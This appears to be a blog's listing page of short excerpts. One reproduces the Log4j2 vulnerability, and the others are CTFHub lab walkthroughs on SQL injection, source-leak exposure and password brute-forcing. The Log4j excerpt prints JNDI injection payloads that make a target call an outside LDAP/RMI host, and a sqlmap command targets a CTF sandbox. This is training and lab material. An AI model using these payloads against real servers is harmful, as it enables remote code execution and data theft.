- 博客(11)
- 收藏
- 关注
RSS订阅原创 Log4j2漏洞复现
Log4j2漏洞复现payload :${jndi:ldap://${sys:java.version}.xxx.dnslog.cn}${jndi:rmi://${sys:java.version}.xxx.dnslog.cn}${jndi:ldap://sb6vjj.dnslog.cn/exp}1.环境配置:靶机:kali220vps:centos攻击机:win102.测试漏洞漏洞点在action参数,将poc输入之前,要现在dnslog申请一个地址。构造payload:htt
2022-02-16 15:46:58
2930
原创 CTFHub技能树-Web-SQL注入-字符型注入
这个题目我使用的sqlmap做的,需要python环境的支持。sqlmap安装教程,点击跳转。1.我们打开环境。2.使用sqlmap获取当前网站数据库的名称sqlmap.py -u "http://challenge-360c6b5a7e81662d.sandbox.ctfhub.com:10080/b.com:10080/?id=1" --current-db3.获取sqli数据库中的表名发现flag表4.获取flag表中的字段名发现flag字段5.获取flag字段的内容得到f
2020-09-02 21:29:24
503
原创 ctfhub-SQL注入-SQL整数型注入
做这个题目前,建议去B站看一下SQL注入的视频,挺基础的,也有了解。 2020最新Java老王带你了解SQL注入(配套源码+笔记)关键字/语句/函数 解释union select 联合查询,联合注入常用database() 回显当前连接的数据库version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6group_concat() 把产生的同一分组中的值用,连接,形成一个字符串information_schema 存了很多
2020-09-01 21:06:21
665
2
原创 CTFHUB——技能树——密码口令——弱口令
通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令1.我们首先打开环境 ,发现使用用户名和密码.2.设置代理 ,使用burp抓包,如何安装插件自行百度,教程很简单。3....
2020-08-28 19:50:57
4344
原创 ctfhub技能树—信息泄露—git泄露—SVN泄露
漏洞产生原因:当开发人员使用 SVN 进行版本控制,对站点自动部署。如果配置不当,可能会将.svn文件夹直接部署到线上环境。这就引起了 SVN 泄露漏洞。1.这个题目需要dvcs-ripper 我安装到了kali中//安装dvcs-ripper-----git clone https://github.com/kost/dvcs-ripper.git//安装相应的依赖包-----sudo apt-get install perl libio-socket-ssl-perl libdbd-sqli
2020-08-26 20:38:02
1239
1
原创 ctfhub技能树—信息泄露—git泄露—Stash
git stash 的作用git stash用于想要保存当前的修改,但是想回到之前最后一次提交的干净的工作仓库时进行的操作.git stash将本地的修改保存起来,并且将当前代码切换到HEAD提交上.通过git stash存储的修改列表,可以通过git stash list查看.git stash show用于校验,git stash apply用于重新存储.直接执行git stash等同于git stash save.最新的存储保存在refs/stash中.老的存储可以通过相关的参数获得,例如sta
2020-08-25 15:13:31
2289
原创 ctfhub技能树——信息泄露——git泄露——Log
我们首先了解什么是git泄露当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。我们打开环境,查看页面。 使用githack工具对网址进行扫描(githack只能在python2中运行,还要安装git!!!网上有教程,一定要配好环境,当时吃了很多苦头,我是在虚拟机上运行的,因为我电脑上已经有了python3。)生成一个dist文件夹 ,文件夹里面还有一个文件夹,我们进去按住shift右键打开命令行。使用gi
2020-08-24 21:50:52
2021
1
原创 ctfhub技能树—信息泄露—备份文件下载—.DS_Store
我们首先了解什么是.DS_Store?.DS_Store 文件利用 .DS_Store 是 Mac OS 保存文件夹的自定义属性的隐藏文件。通过.DS_Store可以知道这个目录里面所有文件的清单。打开靶机,查看环境。使用dirsearch进行扫描。发现不一样的。我们试着去访问.发现可以下载文件,我们下载查看是乱码,我们试着去linux中打开。在Linux中打开,发现.txt文件。.txt后边的不要复制,我们试着去访问,得到flag。...
2020-08-23 15:33:18
2406
原创 ctfhub技能树—信息泄露—备份文件下载—vim缓存
我们首先打开环境在使用vim时会创建临时缓存文件,关闭vim时缓存文件则会被删除,当vim异常退出后,因为未处理缓存文件,导致可以通过缓存文件恢复原始文件内容以 index.php 为例:第一次产生的交换文件名为 .index.php.swp再次意外退出后,将会产生名为 .index.php.swo 的交换文件第三次产生的交换文件则为 .index.php.swn我们在后边输入.index.php.swp 下载给的文件,移动到Linux中。Linux mv 命令用来为文件或目录改名、或将文.
2020-08-22 17:30:10
558
原创 CTFHub HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。
HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。简单介绍HTTP是超文本传输协议,其定义了客户端与服务器端之间文本传输的规范。HTTP默认使用80端口,这个端口指的是服务端的端口,而客户端使用的端口是动态分配的。当我们没有指定端口访问时,浏览器会默认帮我们添加80端口。我们也可以自己指定访问端口如:http://www.ip138.com:80。 需要注意的是,现在大多数访问都使用了HTTPS协议,而HTTPS的默认端口为443,如果使用80端口访问H
2020-08-21 22:22:10
1745
原创 CTFHub Web前置技能 HTTP协议基础认证
HTTP基础认证我们打开题目,点击跳转发现需要用户名和密码,根据提示“Do you know admin?”,我们猜测用户名为admin。题目给的附件解压完事字典,很明显这道题目要使用爆破。我们挂上代理ip,打开burp suite抓包,随便输入一个密码然后截取.我们发现Basic,Basic 表示“基础认证”.使用解码器解码为admin:123,就是我们输入的用户名与密码.我们右键发送到测试器,添加$。有效载荷集为1,有效载荷类型为自动迭代器,载入给你的字典.有效负载处理里面添加前缀
2020-08-21 21:19:12
544
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人